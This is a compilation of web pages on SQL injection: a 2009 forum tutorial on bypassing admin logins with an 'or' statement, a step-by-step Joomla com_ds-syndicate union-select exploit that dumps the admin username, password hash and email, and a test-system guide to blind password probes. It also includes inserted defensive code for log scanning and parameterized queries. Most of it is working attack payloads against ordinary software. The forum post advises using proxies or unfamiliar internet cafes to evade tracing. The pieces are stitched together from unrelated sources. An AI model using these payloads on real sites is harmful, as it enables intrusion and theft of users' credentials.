
Hacking Websites using Sql Injection statement



Hacking Websites using Sql Injection statement
by dj.topan »Mon Dec 21, 2009 4:22 pm

SQL (Structured Query Language) is a language used for accessing data in
relational databases. It is the de facto standard language for relational
database management. At present almost all existing database servers support this
language for managing their data.

This time I want to give a little guidance on how to hack websites using a simple SQL
injection, with no software, using only the "or" statement.
In this way, someone who called himself as xnuxer never deface the Commission website

As we know, almost every website has special pages that can only be entered by the
administrator. Every person who enters that directory must enter a username
and password as admin, and in this tutorial we try to bypass the password.

Okay, so as not to extend the preamble, let's go straight to the topic. Consider the following
explanation: suppose I have a website, and to be able to configure it I have to go in as
admin. Let's just assume the username is Admin and the password to log in is striped cat;
then the SQL statement looks roughly like this:
select * from admin where username = 'Administrator' and Password = 'cat Striped'

If I go into the root admin and fill in the username and password, then automatically and
surely I can tinker with my website. But what if I do not know the password? This
is the core of this tutorial, where we try to bypass the login
without knowing what the password is.

Before that, I need to explain a little about the use of the logic statement "or", where the
statement can flip a value of "false" to "true" so that, even though we enter the wrong
password, it is still considered correct. For example, to sign in as admin using the or
statement, the input I fill in is "or''= '(without the quotation marks at
the beginning and end) in the username and password. Just by entering that statement,
I can get into my website without needing to know the username and password, and
you are welcome to improvise to find the root admin page on a website. Or look at my previous
posts. And good luck

* Glossary:
"Statement" in this tutorial is synonymous with a command.
Note: Again I remind you to use a proxy or at least do not do it in a place where your
regular browsing (home, office) or your internet cafe already know, better looking
internet cafe you never visit the .. klo can search dipelosok

DOWNLOAD
http://www.ziddu.com/download/954555...ments.rar.html

dj.topan
Member

Posts: 6
Joined: Sun Dec 20, 2009 6:08 pm
Location: SQL Injection
-------------------------------------------------- ------------------------------

Re: Website Hacking using Sql Injection statement


by ali »Mon Dec 21, 2009 5:57 pm

love examples dunk om?? hello

ali
Class 1

Posts: 128
Joined: Tue April 28, 2009 3:47 pm
-------------------------------------------------- ------------------------------

Re: Website Hacking using Sql Injection statement


by vampire »Tue Dec 22, 2009 12:49 pm

And is there an example with a screenshot, om?


vampire
Class 1

Posts: 101
Joined: Sat March 22, 2008 10:04 pm

Implementation of SQL Injection in Joomla


Author: Admin (231 Articles)
Providing learning to you about Web Development, Graphic Design, etc, for free.
Starting from a hobby for knowledge sharing web development in 2007 by 2 students.
Contact:
Homepage: http://www.ilmuwebsite.com
What if the admin is too lazy to update the website? What happens if the admin does not
consider the existing security risks? What if 'the chosen one' is an admin who knows
nothing about data security systems? Ironic indeed. In fact, admins sometimes
underestimate the security of their systems. What happens if your server runs with its
default configuration? These "what if" questions carry a myriad of consequences. What
happens is that an attacker's chances of infiltrating your website and rummaging through
your server increase, and sometimes the attacker profits from exploiting the existing
system in various ways, including making money illicitly, as carders do.

The author will explain how easily a website can be exploited with nothing more than an
internet connection, a web browser, and a little knowledge of SQL queries. The author
should add that he is just an ordinary person with minimal knowledge of data security
systems.

Just recently, one of the Joomla components proved to carry a dangerous disease, a
malignant tumor that spreads throughout the body and is ultimately fatal.

An SQL injection bug has been found in com_ds-syndicate; it is one example of the many
fatal bugs found in Joomla. Beware! The error occurs because the component does not
strictly filter the feed_id variable before it is used in an SQL query. The infiltration is
possible simply because of this flaw in the feed_id variable. At the time of writing, some
sites still have this flaw.

Let's jump right in ...

http://korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1

This URL displays the feed as usual, but it behaves differently when we test its weakness
by adding a quotation mark (') at the end.

http://korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1'

What happened? ... Error ...

The next step is to work through the column order of the 'dssyndicate_feeds' table,
continuing while the same form of error comes back and stopping when a different error
appears:
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* -> same error
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* -> same error
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* -> same error
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* -> same error
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* -> same error
...
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* -> different error

Note the different form of the error when feed_id is filled with 1+order+by+21/*; this
is the benchmark for the SQL injection that follows.

The next step is to use union; for more details on the union function, please read here.

Next, we test whether the union function can be run on the victim's URL.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

Look at the end of that line:

from+wc_users

wc_users is a table taken from the Joomla database structure. It contains the
users' login information.
The list 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 is obtained from the ordering
step described earlier.

After entering the URL above, what you need to do is download the file.

After that, open the newly downloaded file with an editor such as Notepad. Even though it
is an XML file, the author still recommends opening it with Notepad rather than a web
browser, because that makes it possible to read the results of the SQL injection that was
performed.

See the number 2 in the <title> tag:

<title>2 (18)</title>


Ignore the number (18) after it; what matters is the number 2. It means that, based
on the result of the union query, position 2 can be used for the next steps, for example
by replacing the number 2 with another expression to see the MySQL version in use.
Let's go ahead and see the MySQL version used by the
victim. Use this URL ...

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

Note that the number 2 is replaced with @@version. Press enter, then reopen the
downloaded file in Notepad. What happened? The title changed to the MySQL version; the
author found:

<title>5.0.33 (18)</title>

MySQL version 5.0.33. At this point the database can be explored freely. What does an
attacker do next? Yes, get the admin username and password.

Capturing the username and password by force through SQL injection can be done one field
at a time or all at once. To display the username through this SQL injection bug,
you simply replace the @@version used earlier with the field that
stores the username. Use this URL:

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

Run the URL, download the file, then reopen it with Notepad. The result is the username
from the database ...

<title>admin (18)</title>

It is also possible to display the username, password, email and usertype all at
once, using a URL like this:

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

Note that the string username is replaced by
concat(username,0x3a,password,0x3a,email,0x3a,usertype). Inside concat, the hex value is
converted to its ASCII character, so 0x3a becomes a colon (:). Reopen the file produced by
the URL above. The author gets information like this:

admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrators

Broken down:
Username: admin
Password (hash): bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email: alkemail@gmail.com
User type: Super Administrators

What remains to be done is to try to crack the password, because it is still in the form
of a hash; in other words, the password is still encrypted. The forced capture of the
username and password has happened, and the attacker now looks for a way to get the
original password, that is, how to crack the password hash.

This is proof that a website can so easily be taken over by an attacker, the result of an
admin too lazy to patch the systems in place.
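For admins who want to check whether their own site has received requests like the ones walked through above, here is an added example (not code from the article or from Joomla) that scans access-log lines and flags any ds-syndicate request whose feed_id is not a plain integer, which is the strict filter the component lacked. The log format, the sample lines and the function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (simplified format) built from the request
# shapes in the article; the IPs are documentation addresses.
SAMPLE_LOG = [
    '198.51.100.7 "GET /index2.php?option=ds-syndicate&version=1&feed_id=1 HTTP/1.1" 200',
    '198.51.100.7 "GET /index2.php?option=ds-syndicate&version=1&feed_id=1%27 HTTP/1.1" 200',
    '198.51.100.7 "GET /index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* HTTP/1.1" 200',
    '198.51.100.7 "GET /index2.php?option=ds-syndicate&version=1'
    '&feed_id=1+union+all+select+1,@@version,3+from+wc_users HTTP/1.1" 200',
    '203.0.113.9 "GET /index2.php?option=ds-syndicate&version=1&feed_id=42 HTTP/1.1" 200',
]
REQUEST_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+"')
# Triage labels only; the actual rule is "feed_id must be a plain integer".
SIGNATURES = {
    "quote": re.compile(r"['\"]"),
    "order-by": re.compile(r"\border\s+by\b", re.I),
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "server-variable": re.compile(r"@@"),
    "comment": re.compile(r"/\*|--|#"),
}

def feed_id_findings(target):
    """Return (value, labels) for each feed_id that is not a plain integer."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option") != ["ds-syndicate"]:
        return []
    findings = []
    for value in params.get("feed_id", []):
        if re.fullmatch(r"[0-9]{1,10}", value):
            continue  # what a strictly filtered feed_id looks like
        labels = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        findings.append((value, labels or ["non-integer"]))
    return findings

def scan(lines):
    """Return (client, feed_id value, labels) for every suspicious request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if match:
            for value, labels in feed_id_findings(match.group(2)):
                hits.append((match.group(1), value, labels))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer check, applied in the component before the value reaches the query, closes the hole; in the log it tells you whether someone has already been probing it.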

In the next article the author will run through a simple concept for cracking Joomla
passwords using PHP. Wait for the sequel ....

For experimental purposes, please download the file here.


http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip
http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz

greetz: b_scorpio cement business, which the staff ilmuwebsite ngurus thesis
Peterpanz the inconvenience ngurus thesis also, mr.freeman, for jojo too, Najwa [at]
STSN, dr.emi, Denice the manace, Phii_ Fadli

How to exploit the SQL Injection Attack

Exploiting an SQL Inject attack involves solving a puzzle that is a cross between
Hangman and 20 Questions. It needs a little understanding of SQL and a great deal of
cunning.

Try your Hacking skills against this test system. It takes you through the exploit
step-by-step.

The SQL Injection attack allows external users to read details from the database. In a well
designed system this will only include data that is available to the public anyway. In a
poorly designed system this may allow external users to discover other users' passwords.

Try these steps:


To gain access and find a user name. Enter the string as both user name and password in
the frame on the right. This should get you logged in as a user (jake happens to be the
first user in the table). This tells you that Jake is a user and it allows you to access his
account - but it does not tell you his password.

Find out if Jake's password includes the letter "w". Enter xxx as user name and enter the
following string as the password: ' OR EXISTS(SELECT * FROM users WHERE
name='jake' AND password LIKE '%w%') AND ''='

Find out if Jake's password has "w" as the third letter. Enter xxx as user name and enter
the following string as the password: ' OR EXISTS(SELECT * FROM users WHERE
name='jake' AND password LIKE '__w%') AND ''='
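
An added example (not part of the original page or of the test system it describes): the programming error behind both the "or" login bypass described in the forum post earlier on this page and the password-letter probes above, shown next to the parameterized form that defeats them. The table layout, the stored password, the exact "or" string and the function names are assumptions; SQLite stands in for the real database.

```python
import sqlite3

def make_db():
    """Constructed test table with one user, as in the walkthrough above."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    # Constructed value; plaintext only to mirror the test system described.
    db.execute("INSERT INTO users VALUES ('jake', 'sparrow')")
    return db

def login_vulnerable(db, name, password):
    # The programming error: input is pasted into the SQL text, so a quote
    # in the input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT name FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, name, password):
    # The cure: placeholders keep input as data. It is only ever compared
    # with the stored columns and never parsed as SQL.
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (name, password),
    ).fetchone()
    return row[0] if row else None

OR_STATEMENT = "' or ''='"   # assumed form of the "or" statement
LIKE_PROBE = ("' OR EXISTS(SELECT * FROM users WHERE name='jake' "
              "AND password LIKE '%w%') AND ''='")
ABSENT_PROBE = LIKE_PROBE.replace("%w%", "%z%")

def compare(db):
    """Return (vulnerable, parameterized) login results per test input."""
    cases = {
        "valid login": ("jake", "sparrow"),
        "or statement": (OR_STATEMENT, OR_STATEMENT),
        "like probe, letter present": ("xxx", LIKE_PROBE),
        "like probe, letter absent": ("xxx", ABSENT_PROBE),
    }
    return {label: (login_vulnerable(db, n, p), login_parameterized(db, n, p))
            for label, (n, p) in cases.items()}

if __name__ == "__main__":
    for label, (weak, safe) in compare(make_db()).items():
        print(f"{label:28} vulnerable={weak!r:8} parameterized={safe!r}")
```

With the concatenated query the login result leaks one bit per probe (logged in or not); with placeholders every probe is just a wrong password.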

Diagnosis
In which we explain how to identify a web site that may be vulnerable to an SQL
Injection attack.

Causes and Cures for SQL Injection Vulnerability
Explains the programming error that gives rise to the problem.

Exploit: Gain unauthorized Access
In which we explain how to get past a login screen without knowing a user name or a
password.

Exploit: Find a password.
In which we explain how to discover the password for a user if you know the name of the
password table and a user account.

Exploit: Find a user account.
In which we explain how to discover the user names in the password table given that we
know the name of the password table.

Exploit: Find the names of the tables.
In which we discover the names of the tables available for viewing. This might include the
name of the password table.

WARNING: In many countries (including UK) it is illegal to use this attack. I've set up a
vulnerable test system here so that you can have a go. I promise not to prosecute.

Up to 6 months in jail for unauthorised access
Up to 5 years if with intent to commit further offences
--------------------------------------------------------------------------------

Bragging Board: If you can figure out a username and password combination then you can
brag about it here.

Note that phpBB is NOT vulnerable to an SQL Injection attack. But to use this one you
